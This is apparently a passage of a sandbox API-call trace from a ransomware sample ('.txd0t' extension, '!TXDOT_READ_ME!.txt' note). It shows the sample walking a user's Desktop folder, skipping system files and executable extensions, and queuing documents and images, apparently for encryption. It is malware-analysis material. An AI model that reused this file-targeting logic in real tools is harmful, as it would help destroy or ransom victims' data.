ftCreationTime.dwHighDateTime=0x1d5ecb4, ftLastAccessTime.dwLowDateTime=0xa8d8b3a0, ftLastAccessTime.dwHighDateTime=0x1d5eb76, ftLastWriteTime.dwLowDateTime=0xa8d8b3a0, ftLastWriteTime.dwHighDateTime=0x1d5eb76, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec25f0 [0073.555] StrCmpW (psz1=".", psz2=".") returned 0 [0073.555] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca249080, ftCreationTime.dwHighDateTime=0x1d5ecb4, ftLastAccessTime.dwLowDateTime=0xa8d8b3a0, ftLastAccessTime.dwHighDateTime=0x1d5eb76, ftLastWriteTime.dwLowDateTime=0xa8d8b3a0, ftLastWriteTime.dwHighDateTime=0x1d5eb76, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0073.556] StrCmpW (psz1="..", psz2=".") returned 1 [0073.556] StrCmpW (psz1="..", psz2="..") returned 0 [0073.556] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabe15650, ftCreationTime.dwHighDateTime=0x1d5e500, ftLastAccessTime.dwLowDateTime=0xcd226e0, ftLastAccessTime.dwHighDateTime=0x1d5eb39, ftLastWriteTime.dwLowDateTime=0xcd226e0, ftLastWriteTime.dwHighDateTime=0x1d5eb39, nFileSizeHigh=0x0, nFileSizeLow=0x1379, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="36V5IRtis-.pps", cAlternateFileName="36V5IR~1.PPS")) returned 1 [0073.556] StrCmpW (psz1="36V5IRtis-.pps", psz2=".") returned 1 [0073.556] StrCmpW (psz1="36V5IRtis-.pps", psz2="..") returned 1 [0073.556] StrCpyNW (in: psz1=0xed36a8, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0073.556] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0073.556] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="36V5IRtis-.pps", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\36V5IRtis-.pps") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\36V5IRtis-.pps" [0073.556] PathFindExtensionW (pszPath="36V5IRtis-.pps") returned=".pps" [0073.556] StrCmpW (psz1=".pps", psz2=".txd0t") returned -1 [0073.556] StrCmpIW (psz1="36V5IRtis-.pps", psz2="bootsect.bak") returned -1 [0073.556] StrCmpIW (psz1="36V5IRtis-.pps", psz2="iconcache.db") returned -1 [0073.556] StrCmpIW (psz1="36V5IRtis-.pps", psz2="thumbs.db") returned -1 [0073.556] StrCmpIW (psz1="36V5IRtis-.pps", psz2=" ransomware ") returned 1 [0073.556] StrCmpIW (psz1="36V5IRtis-.pps", psz2=" ransom ") returned 1 [0073.556] StrCmpIW (psz1="36V5IRtis-.pps", psz2="debug.txt") returned -1 [0073.556] StrCmpIW (psz1="36V5IRtis-.pps", psz2="boot.ini") returned -1 [0073.556] StrCmpIW (psz1="36V5IRtis-.pps", psz2="desktop.ini") returned -1 [0073.556] StrCmpIW (psz1="36V5IRtis-.pps", psz2="autorun.inf") returned -1 [0073.556] StrCmpIW (psz1="36V5IRtis-.pps", psz2="ntuser.dat") returned -1 [0073.556] StrCmpIW (psz1="36V5IRtis-.pps", psz2="ntldr") returned -1 [0073.556] StrCmpIW (psz1="36V5IRtis-.pps", psz2="ntdetect.com") returned -1 [0073.557] StrCmpIW (psz1="36V5IRtis-.pps", psz2="bootfont.bin") returned -1 [0073.557] StrCmpIW (psz1="36V5IRtis-.pps", psz2="!TXDOT_READ_ME!.txt") returned 1 [0073.557] PathFindExtensionW (pszPath="36V5IRtis-.pps") returned=".pps" [0073.557] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".pps") returned 0x0 [0073.557] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0073.557] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0073.557] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0073.599] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0073.599] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\36V5IRtis-.pps", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\36V5IRtis-.pps") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\36V5IRtis-.pps" [0073.599] SetEvent (hEvent=0x3fc) returned 1 [0073.599] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa3cba40, ftCreationTime.dwHighDateTime=0x1d5efc5, ftLastAccessTime.dwLowDateTime=0x246cc5d0, ftLastAccessTime.dwHighDateTime=0x1d5e800, ftLastWriteTime.dwLowDateTime=0x246cc5d0, ftLastWriteTime.dwHighDateTime=0x1d5e800, nFileSizeHigh=0x0, nFileSizeLow=0xdbb4, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="3dId0lsBJQweABTLa.bmp", cAlternateFileName="3DID0L~1.BMP")) returned 1 [0073.599] StrCmpW (psz1="3dId0lsBJQweABTLa.bmp", psz2=".") returned 1 [0073.599] StrCmpW (psz1="3dId0lsBJQweABTLa.bmp", psz2="..") returned 1 [0073.599] StrCpyNW (in: psz1=0xed36a8, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0073.599] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0073.599] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="3dId0lsBJQweABTLa.bmp", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\3dId0lsBJQweABTLa.bmp") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\3dId0lsBJQweABTLa.bmp" [0073.599] PathFindExtensionW (pszPath="3dId0lsBJQweABTLa.bmp") returned=".bmp" [0073.600] StrCmpW (psz1=".bmp", psz2=".txd0t") returned -1 [0073.600] StrCmpIW (psz1="3dId0lsBJQweABTLa.bmp", psz2="bootsect.bak") returned -1 [0073.600] StrCmpIW (psz1="3dId0lsBJQweABTLa.bmp", psz2="iconcache.db") returned -1 [0073.600] StrCmpIW (psz1="3dId0lsBJQweABTLa.bmp", psz2="thumbs.db") returned -1 [0073.600] StrCmpIW (psz1="3dId0lsBJQweABTLa.bmp", psz2=" ransomware ") returned 1 [0073.600] StrCmpIW (psz1="3dId0lsBJQweABTLa.bmp", psz2=" ransom ") returned 1 [0073.600] StrCmpIW (psz1="3dId0lsBJQweABTLa.bmp", psz2="debug.txt") returned -1 [0073.600] StrCmpIW (psz1="3dId0lsBJQweABTLa.bmp", psz2="boot.ini") returned -1 [0073.600] StrCmpIW (psz1="3dId0lsBJQweABTLa.bmp", psz2="desktop.ini") returned -1 [0073.600] StrCmpIW (psz1="3dId0lsBJQweABTLa.bmp", psz2="autorun.inf") returned -1 [0073.600] StrCmpIW (psz1="3dId0lsBJQweABTLa.bmp", psz2="ntuser.dat") returned -1 [0073.600] StrCmpIW (psz1="3dId0lsBJQweABTLa.bmp", psz2="ntldr") returned -1 [0073.600] StrCmpIW (psz1="3dId0lsBJQweABTLa.bmp", psz2="ntdetect.com") returned -1 [0073.600] StrCmpIW (psz1="3dId0lsBJQweABTLa.bmp", psz2="bootfont.bin") returned -1 [0073.600] StrCmpIW (psz1="3dId0lsBJQweABTLa.bmp", psz2="!TXDOT_READ_ME!.txt") returned 1 [0073.600] PathFindExtensionW (pszPath="3dId0lsBJQweABTLa.bmp") returned=".bmp" [0073.600] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".bmp") returned 0x0 [0073.600] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0073.600] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0073.600] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0073.649] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0073.649] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\3dId0lsBJQweABTLa.bmp", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\3dId0lsBJQweABTLa.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\3dId0lsBJQweABTLa.bmp" [0073.649] SetEvent (hEvent=0x410) returned 1 [0073.649] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde3152a0, ftCreationTime.dwHighDateTime=0x1d5efae, ftLastAccessTime.dwLowDateTime=0xc34157f0, ftLastAccessTime.dwHighDateTime=0x1d5eab4, ftLastWriteTime.dwLowDateTime=0xc34157f0, ftLastWriteTime.dwHighDateTime=0x1d5eab4, nFileSizeHigh=0x0, nFileSizeLow=0x16c02, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="8_rlQ cdl 6S_NtQ4.ods", cAlternateFileName="8_RLQC~1.ODS")) returned 1 [0073.649] StrCmpW (psz1="8_rlQ cdl 6S_NtQ4.ods", psz2=".") returned 1 [0073.649] StrCmpW (psz1="8_rlQ cdl 6S_NtQ4.ods", psz2="..") returned 1 [0073.649] StrCpyNW (in: psz1=0xed36a8, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0073.649] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0073.649] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="8_rlQ cdl 6S_NtQ4.ods", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\8_rlQ cdl 6S_NtQ4.ods") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\8_rlQ cdl 6S_NtQ4.ods" [0073.649] PathFindExtensionW (pszPath="8_rlQ cdl 6S_NtQ4.ods") returned=".ods" [0073.649] StrCmpW (psz1=".ods", psz2=".txd0t") returned -1 [0073.649] StrCmpIW (psz1="8_rlQ cdl 6S_NtQ4.ods", psz2="bootsect.bak") returned -1 [0073.649] StrCmpIW (psz1="8_rlQ cdl 6S_NtQ4.ods", psz2="iconcache.db") returned -1 [0073.649] StrCmpIW (psz1="8_rlQ cdl 6S_NtQ4.ods", psz2="thumbs.db") returned -1 [0073.649] StrCmpIW (psz1="8_rlQ cdl 6S_NtQ4.ods", psz2=" ransomware ") returned 1 [0073.649] StrCmpIW (psz1="8_rlQ cdl 6S_NtQ4.ods", psz2=" ransom ") returned 1 [0073.649] StrCmpIW (psz1="8_rlQ cdl 6S_NtQ4.ods", psz2="debug.txt") returned -1 [0073.649] StrCmpIW (psz1="8_rlQ cdl 6S_NtQ4.ods", psz2="boot.ini") returned -1 [0073.649] StrCmpIW (psz1="8_rlQ cdl 6S_NtQ4.ods", psz2="desktop.ini") returned -1 [0073.649] StrCmpIW (psz1="8_rlQ cdl 6S_NtQ4.ods", psz2="autorun.inf") returned -1 [0073.649] StrCmpIW (psz1="8_rlQ cdl 6S_NtQ4.ods", psz2="ntuser.dat") returned -1 [0073.650] StrCmpIW (psz1="8_rlQ cdl 6S_NtQ4.ods", psz2="ntldr") returned -1 [0073.650] StrCmpIW (psz1="8_rlQ cdl 6S_NtQ4.ods", psz2="ntdetect.com") returned -1 [0073.650] StrCmpIW (psz1="8_rlQ cdl 6S_NtQ4.ods", psz2="bootfont.bin") returned -1 [0073.650] StrCmpIW (psz1="8_rlQ cdl 6S_NtQ4.ods", psz2="!TXDOT_READ_ME!.txt") returned 1 [0073.650] PathFindExtensionW (pszPath="8_rlQ cdl 6S_NtQ4.ods") returned=".ods" [0073.650] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ods") returned 0x0 [0073.650] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0073.650] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0073.650] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0073.659] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0073.659] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\8_rlQ cdl 6S_NtQ4.ods", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\8_rlQ cdl 6S_NtQ4.ods") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\8_rlQ cdl 6S_NtQ4.ods" [0073.659] SetEvent (hEvent=0x418) returned 1 [0073.659] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2df6f500, ftCreationTime.dwHighDateTime=0x1d5e6eb, ftLastAccessTime.dwLowDateTime=0xe2b8a110, ftLastAccessTime.dwHighDateTime=0x1d5e96f, ftLastWriteTime.dwLowDateTime=0xe2b8a110, ftLastWriteTime.dwHighDateTime=0x1d5e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1158d, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="9JP3XV6aItTN8Fsv.gif", cAlternateFileName="9JP3XV~1.GIF")) returned 1 [0073.659] StrCmpW (psz1="9JP3XV6aItTN8Fsv.gif", psz2=".") returned 1 [0073.659] StrCmpW (psz1="9JP3XV6aItTN8Fsv.gif", psz2="..") returned 1 [0073.659] StrCpyNW (in: psz1=0xed36a8, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0073.659] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0073.659] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="9JP3XV6aItTN8Fsv.gif", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\9JP3XV6aItTN8Fsv.gif") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\9JP3XV6aItTN8Fsv.gif" [0073.659] PathFindExtensionW (pszPath="9JP3XV6aItTN8Fsv.gif") returned=".gif" [0073.659] StrCmpW (psz1=".gif", psz2=".txd0t") returned -1 [0073.659] StrCmpIW (psz1="9JP3XV6aItTN8Fsv.gif", psz2="bootsect.bak") returned -1 [0073.659] StrCmpIW (psz1="9JP3XV6aItTN8Fsv.gif", psz2="iconcache.db") returned -1 [0073.659] StrCmpIW (psz1="9JP3XV6aItTN8Fsv.gif", psz2="thumbs.db") returned -1 [0073.659] StrCmpIW (psz1="9JP3XV6aItTN8Fsv.gif", psz2=" ransomware ") returned 1 [0073.659] StrCmpIW (psz1="9JP3XV6aItTN8Fsv.gif", psz2=" ransom ") returned 1 [0073.659] StrCmpIW (psz1="9JP3XV6aItTN8Fsv.gif", psz2="debug.txt") returned -1 [0073.659] StrCmpIW (psz1="9JP3XV6aItTN8Fsv.gif", psz2="boot.ini") returned -1 [0073.660] StrCmpIW (psz1="9JP3XV6aItTN8Fsv.gif", psz2="desktop.ini") returned -1 [0073.660] StrCmpIW (psz1="9JP3XV6aItTN8Fsv.gif", psz2="autorun.inf") returned -1 [0073.660] StrCmpIW (psz1="9JP3XV6aItTN8Fsv.gif", psz2="ntuser.dat") returned -1 [0073.660] StrCmpIW (psz1="9JP3XV6aItTN8Fsv.gif", psz2="ntldr") returned -1 [0073.660] StrCmpIW (psz1="9JP3XV6aItTN8Fsv.gif", psz2="ntdetect.com") returned -1 [0073.660] StrCmpIW (psz1="9JP3XV6aItTN8Fsv.gif", psz2="bootfont.bin") returned -1 [0073.660] StrCmpIW (psz1="9JP3XV6aItTN8Fsv.gif", psz2="!TXDOT_READ_ME!.txt") returned 1 [0073.660] PathFindExtensionW (pszPath="9JP3XV6aItTN8Fsv.gif") returned=".gif" [0073.660] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".gif") returned 0x0 [0073.660] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0073.660] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0073.660] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0073.675] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0073.675] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\9JP3XV6aItTN8Fsv.gif", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\9JP3XV6aItTN8Fsv.gif") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\9JP3XV6aItTN8Fsv.gif" [0073.675] SetEvent (hEvent=0x418) returned 1 [0073.675] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e374e70, ftCreationTime.dwHighDateTime=0x1d5e95f, ftLastAccessTime.dwLowDateTime=0x551e57d0, ftLastAccessTime.dwHighDateTime=0x1d5e0fc, ftLastWriteTime.dwLowDateTime=0x551e57d0, ftLastWriteTime.dwHighDateTime=0x1d5e0fc, nFileSizeHigh=0x0, nFileSizeLow=0xd497, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="aNP_CKGono8FHP.bmp", cAlternateFileName="ANP_CK~1.BMP")) returned 1 [0073.675] StrCmpW (psz1="aNP_CKGono8FHP.bmp", psz2=".") returned 1 [0073.675] StrCmpW (psz1="aNP_CKGono8FHP.bmp", psz2="..") returned 1 [0073.675] StrCpyNW (in: psz1=0xed36a8, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0073.675] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0073.675] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="aNP_CKGono8FHP.bmp", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\aNP_CKGono8FHP.bmp") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\aNP_CKGono8FHP.bmp" [0073.676] PathFindExtensionW (pszPath="aNP_CKGono8FHP.bmp") returned=".bmp" [0073.676] StrCmpW (psz1=".bmp", psz2=".txd0t") returned -1 [0073.676] StrCmpIW (psz1="aNP_CKGono8FHP.bmp", psz2="bootsect.bak") returned -1 [0073.676] StrCmpIW (psz1="aNP_CKGono8FHP.bmp", psz2="iconcache.db") returned -1 [0073.676] StrCmpIW (psz1="aNP_CKGono8FHP.bmp", psz2="thumbs.db") returned -1 [0073.676] StrCmpIW (psz1="aNP_CKGono8FHP.bmp", psz2=" ransomware ") returned 1 [0073.676] StrCmpIW (psz1="aNP_CKGono8FHP.bmp", psz2=" ransom ") returned 1 [0073.676] StrCmpIW (psz1="aNP_CKGono8FHP.bmp", psz2="debug.txt") returned -1 [0073.676] StrCmpIW (psz1="aNP_CKGono8FHP.bmp", psz2="boot.ini") returned -1 [0073.676] StrCmpIW (psz1="aNP_CKGono8FHP.bmp", psz2="desktop.ini") returned -1 [0073.723] StrCmpIW (psz1="aNP_CKGono8FHP.bmp", psz2="autorun.inf") returned -1 [0073.723] StrCmpIW (psz1="aNP_CKGono8FHP.bmp", psz2="ntuser.dat") returned -1 [0073.723] StrCmpIW (psz1="aNP_CKGono8FHP.bmp", psz2="ntldr") returned -1 [0073.723] StrCmpIW (psz1="aNP_CKGono8FHP.bmp", psz2="ntdetect.com") returned -1 [0073.723] StrCmpIW (psz1="aNP_CKGono8FHP.bmp", psz2="bootfont.bin") returned -1 [0073.723] StrCmpIW (psz1="aNP_CKGono8FHP.bmp", psz2="!TXDOT_READ_ME!.txt") returned 1 [0073.723] PathFindExtensionW (pszPath="aNP_CKGono8FHP.bmp") returned=".bmp" [0073.723] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".bmp") returned 0x0 [0073.723] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0073.723] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0073.723] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0073.738] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0073.738] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\aNP_CKGono8FHP.bmp", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\aNP_CKGono8FHP.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\aNP_CKGono8FHP.bmp" [0073.738] SetEvent (hEvent=0x418) returned 1 [0073.739] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59d84430, ftCreationTime.dwHighDateTime=0x1d5ec72, ftLastAccessTime.dwLowDateTime=0x6b71ab60, ftLastAccessTime.dwHighDateTime=0x1d5edb6, ftLastWriteTime.dwLowDateTime=0x6b71ab60, ftLastWriteTime.dwHighDateTime=0x1d5edb6, nFileSizeHigh=0x0, nFileSizeLow=0x3198, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Eiu0lN-XaE.docx", cAlternateFileName="EIU0LN~1.DOC")) returned 1 [0073.739] StrCmpW (psz1="Eiu0lN-XaE.docx", psz2=".") returned 1 [0073.739] StrCmpW (psz1="Eiu0lN-XaE.docx", psz2="..") returned 1 [0073.739] StrCpyNW (in: psz1=0xed36a8, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0073.739] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0073.739] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="Eiu0lN-XaE.docx", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Eiu0lN-XaE.docx") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Eiu0lN-XaE.docx" [0073.739] PathFindExtensionW (pszPath="Eiu0lN-XaE.docx") returned=".docx" [0073.739] StrCmpW (psz1=".docx", psz2=".txd0t") returned -1 [0073.739] StrCmpIW (psz1="Eiu0lN-XaE.docx", psz2="bootsect.bak") returned 1 [0073.739] StrCmpIW (psz1="Eiu0lN-XaE.docx", psz2="iconcache.db") returned -1 [0073.739] StrCmpIW (psz1="Eiu0lN-XaE.docx", psz2="thumbs.db") returned -1 [0073.739] StrCmpIW (psz1="Eiu0lN-XaE.docx", psz2=" ransomware ") returned 1 [0073.739] StrCmpIW (psz1="Eiu0lN-XaE.docx", psz2=" ransom ") returned 1 [0073.739] StrCmpIW (psz1="Eiu0lN-XaE.docx", psz2="debug.txt") returned 1 [0073.739] StrCmpIW (psz1="Eiu0lN-XaE.docx", psz2="boot.ini") returned 1 [0073.739] StrCmpIW (psz1="Eiu0lN-XaE.docx", psz2="desktop.ini") returned 1 [0073.739] StrCmpIW (psz1="Eiu0lN-XaE.docx", psz2="autorun.inf") returned 1 [0073.739] StrCmpIW (psz1="Eiu0lN-XaE.docx", psz2="ntuser.dat") returned -1 [0073.739] StrCmpIW (psz1="Eiu0lN-XaE.docx", psz2="ntldr") returned -1 [0073.739] StrCmpIW (psz1="Eiu0lN-XaE.docx", psz2="ntdetect.com") returned -1 [0073.739] StrCmpIW (psz1="Eiu0lN-XaE.docx", psz2="bootfont.bin") returned 1 [0073.739] StrCmpIW (psz1="Eiu0lN-XaE.docx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0073.739] PathFindExtensionW (pszPath="Eiu0lN-XaE.docx") returned=".docx" [0073.739] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".docx") returned 0x0 [0073.739] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0073.739] 